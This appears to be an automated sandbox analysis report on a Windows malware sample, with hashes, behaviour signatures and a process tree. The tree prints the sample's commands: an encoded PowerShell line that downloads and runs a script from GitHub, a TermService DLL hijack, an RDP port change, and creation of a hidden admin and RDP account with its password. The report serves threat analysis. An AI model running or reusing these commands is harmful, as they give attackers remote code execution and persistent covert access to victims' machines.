Analysis
- max time kernel: 150s
- max time network: 99s
- platform: windows10_x64
- resource: win10v20210408
- submitted: 24-09-2021 21:43
- Static task: static1
- Behavioral task: behavioral1 (sample 83d119a963e7050995f9bf6be8841b95.exe, resource win7-en-20210920)
- Behavioral task: behavioral2 (sample 83d119a963e7050995f9bf6be8841b95.exe, resource win10v20210408)
General
- Target: 83d119a963e7050995f9bf6be8841b95.exe
- Size: 5.7MB
- MD5: 83d119a963e7050995f9bf6be8841b95
- SHA1: 2ba0e479d5c2b7b9b28c7f946bd56489cedaa126
- SHA256: d7ef71aa67e1fb5a364c97ff4b89f5f6a28db1c84f91563547a4e44581833486
- SHA512: 4c740f5e0f4787fc268239882fe9b74ee00944053ac4c45ca1d114dbd22954f00c3f4fd5fb39be932b44e6da9380466d07b324150454357bf7b12a17b77ceffe
Malware Config
- Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
- Grants admin privileges (1 TTP): uses net.exe to modify the user's privileges.
- Blocklisted process makes network request (9 IoCs)
  Processes: powershell.exe (PID 5068), network flows 8, 10, 11, 12, 14, 16, 18, 20, 22
- Modifies RDP port number used by Windows (1 TTP)
- Sets DLL path for service in the registry (2 TTPs)
- YARA rule matches (resource: rule)
  - \Windows\Branding\mediasrv.png: upx
  - \Windows\Branding\mediasvc.png: upx
- Loads dropped DLL (2 IoCs)
  Processes: PID 4232 (listed twice, process name blank)
- Drops file in Program Files directory (4 IoCs)
  Processes: powershell.exe
  - File opened for modification: C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT (powershell.exe)
  - File opened for modification: C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI (powershell.exe)
  - File opened for modification: C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT (powershell.exe)
  - File opened for modification: C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI (powershell.exe)
- Drops file in Windows directory (19 IoCs)
  Processes: powershell.exe, powershell.exe
  - File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_zx3sgsyg.0ou.psm1 (powershell.exe)
  - File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF7DA.tmp (powershell.exe)
  - File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat (powershell.exe)
  - File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log (powershell.exe)
  - File created: C:\Windows\branding\mediasvc.png (powershell.exe)
  - File opened for modification: C:\Windows\branding\mediasvc.png (powershell.exe)
  - File opened for modification: C:\Windows\branding\wupsvc.jpg (powershell.exe)
  - File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF7EB.tmp (powershell.exe)
  - File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.exe)
  - File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_1cm2mslq.hrb.ps1 (powershell.exe)
  - File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF77A.tmp (powershell.exe)
  - File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF7C9.tmp (powershell.exe)
  - File opened for modification: C:\Windows\branding\mediasrv.png (powershell.exe)
  - File opened for modification: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIF7FB.tmp (powershell.exe)
  - File created: C:\Windows\branding\wupsvc.jpg (powershell.exe)
  - File opened for modification: C:\Windows\branding\Basebrd (powershell.exe)
  - File opened for modification: C:\Windows\branding\ShellBrd (powershell.exe)
  - File created: C:\Windows\branding\mediasrv.png (powershell.exe)
  - File created: C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP (powershell.exe)
- Modifies data under HKEY_USERS (64 IoCs)
- Modifies registry key (1 TTP, 1 IoC)
- Runs net.exe
- Script User-Agent (4 IoCs): uses a user-agent string associated with a script host/environment.
  HTTP User-Agent header on flows 10, 11, 12 and 14: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- Suspicious behavior: EnumeratesProcesses (18 IoCs)
  Processes (PID, number of events): powershell.exe 4936 (3), powershell.exe 3392 (3), powershell.exe 416 (3), powershell.exe 1100 (3), powershell.exe 4936 (3), powershell.exe 5068 (3)
- Suspicious behavior: LoadsDriver (2 IoCs)
  Processes: PID 616 (listed twice, process name blank)
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes (token privileges adjusted, in the order recorded):
  - powershell.exe (PID 4936): SeDebugPrivilege
  - powershell.exe (PID 3392): SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  - powershell.exe (PID 416): SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  - powershell.exe (PID 1100): SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (source PID wrote to memory of target PID; each pair is recorded twice, 64 entries in total):
  - 4796 (83d119a963e7050995f9bf6be8841b95.exe) wrote to 4936 (powershell.exe)
  - 4936 (powershell.exe) wrote to 5104 (csc.exe)
  - 5104 (csc.exe) wrote to 3268 (cvtres.exe)
  - 4936 (powershell.exe) wrote to 3392 (powershell.exe)
  - 4936 (powershell.exe) wrote to 416 (powershell.exe)
  - 4936 (powershell.exe) wrote to 1100 (powershell.exe)
  - 4936 (powershell.exe) wrote to 4716 (reg.exe)
  - 4936 (powershell.exe) wrote to 3344 (reg.exe)
  - 4936 (powershell.exe) wrote to 3340 (reg.exe)
  - 4936 (powershell.exe) wrote to 4104 (net.exe)
  - 4104 (net.exe) wrote to 1008 (net1.exe)
  - 4936 (powershell.exe) wrote to 3604 (cmd.exe)
  - 3604 (cmd.exe) wrote to 3708 (cmd.exe)
  - 3708 (cmd.exe) wrote to 2884 (net.exe)
  - 2884 (net.exe) wrote to 4260 (net1.exe)
  - 4936 (powershell.exe) wrote to 740 (cmd.exe)
  - 740 (cmd.exe) wrote to 3848 (cmd.exe)
  - 3848 (cmd.exe) wrote to 3940 (net.exe)
  - 3940 (net.exe) wrote to 3440 (net1.exe)
  - 4264 (cmd.exe) wrote to 3684 (net.exe)
  - 3684 (net.exe) wrote to 4496 (net1.exe)
  - 812 (cmd.exe) wrote to 1396 (net.exe)
  - 1396 (net.exe) wrote to 1524 (net1.exe)
  - 1808 (cmd.exe) wrote to 1040 (net.exe)
  - 1040 (net.exe) wrote to 580 (net1.exe)
  - 2500 (cmd.exe) wrote to 3240 (net.exe)
  - 3240 (net.exe) wrote to 3632 (net1.exe)
  - 4064 (cmd.exe) wrote to 4068 (net.exe)
  - 4068 (net.exe) wrote to 3496 (net1.exe)
  - 2352 (cmd.exe) wrote to 2844 (net.exe)
  - 2844 (net.exe) wrote to 4076 (net1.exe)
  - 2080 (cmd.exe) wrote to 4556 (WMIC.exe)
Processes (process tree; nesting shows parent/child relationship)
- C:\Users\Admin\AppData\Local\Temp\83d119a963e7050995f9bf6be8841b95.exe (PID 4796)
  Command line: "C:\Users\Admin\AppData\Local\Temp\83d119a963e7050995f9bf6be8841b95.exe"
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4936)
    Command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
    Signatures: Drops file in Windows directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (PID 5104)
      Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5drmgc1n\5drmgc1n.cmdline"
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (PID 3268)
        Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES970B.tmp" "c:\Users\Admin\AppData\Local\Temp\5drmgc1n\CSCB94FCE7A99CF424194347C4E4E2EB2.TMP"
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3392)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 416)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1100)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\reg.exe (PID 4716)
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    - C:\Windows\system32\reg.exe (PID 3344)
      Command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      Signatures: Modifies registry key
    - C:\Windows\system32\reg.exe (PID 3340)
      Command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    - C:\Windows\system32\net.exe (PID 4104)
      Command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\net1.exe (PID 1008)
        Command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    - C:\Windows\system32\cmd.exe (PID 3604)
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\cmd.exe (PID 3708)
        Command line: cmd /c net start rdpdr
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\net.exe (PID 2884)
          Command line: net start rdpdr
          Signatures: Suspicious use of WriteProcessMemory
          - C:\Windows\system32\net1.exe (PID 4260)
            Command line: C:\Windows\system32\net1 start rdpdr
    - C:\Windows\system32\cmd.exe (PID 740)
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\cmd.exe (PID 3848)
        Command line: cmd /c net start TermService
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\net.exe (PID 3940)
          Command line: net start TermService
          Signatures: Suspicious use of WriteProcessMemory
          - C:\Windows\system32\net1.exe (PID 3440)
            Command line: C:\Windows\system32\net1 start TermService
    - C:\Windows\system32\cmd.exe (PID 1216)
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    - C:\Windows\system32\cmd.exe (PID 1828)
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
- C:\Windows\System32\cmd.exe (PID 4264)
  Command line: cmd /C net.exe user WgaUtilAcc 000000 /del
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (PID 3684)
    Command line: net.exe user WgaUtilAcc 000000 /del
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 4496)
      Command line: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
- C:\Windows\System32\cmd.exe (PID 812)
  Command line: cmd /C net.exe user WgaUtilAcc 6letaiCK /add
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (PID 1396)
    Command line: net.exe user WgaUtilAcc 6letaiCK /add
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 1524)
      Command line: C:\Windows\system32\net1 user WgaUtilAcc 6letaiCK /add
- C:\Windows\System32\cmd.exe (PID 1808)
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (PID 1040)
    Command line: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 580)
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
- C:\Windows\System32\cmd.exe (PID 2500)
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (PID 3240)
    Command line: net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 3632)
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
- C:\Windows\System32\cmd.exe (PID 4064)
  Command line: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (PID 4068)
    Command line: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 3496)
      Command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
- C:\Windows\System32\cmd.exe (PID 2352)
  Command line: cmd /C net.exe user WgaUtilAcc 6letaiCK
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\net.exe (PID 2844)
    Command line: net.exe user WgaUtilAcc 6letaiCK
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net1.exe (PID 4076)
      Command line: C:\Windows\system32\net1 user WgaUtilAcc 6letaiCK
- C:\Windows\System32\cmd.exe (PID 2080)
  Command line: cmd.exe /C wmic path win32_VideoController get name
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\System32\Wbem\WMIC.exe (PID 4556)
    Command line: wmic path win32_VideoController get name
    Signatures: Modifies data under HKEY_USERS
- C:\Windows\System32\cmd.exe (PID 4708)
  Command line: cmd.exe /C wmic CPU get NAME
  - C:\Windows\System32\Wbem\WMIC.exe (PID 3344)
    Command line: wmic CPU get NAME
- C:\Windows\System32\cmd.exe (PID 4044)
  Command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  - C:\Windows\system32\cmd.exe (PID 5052)
    Command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 5068)
      Command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      Signatures: Blocklisted process makes network request; Drops file in Program Files directory; Drops file in Windows directory; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Enterprise v6
Downloads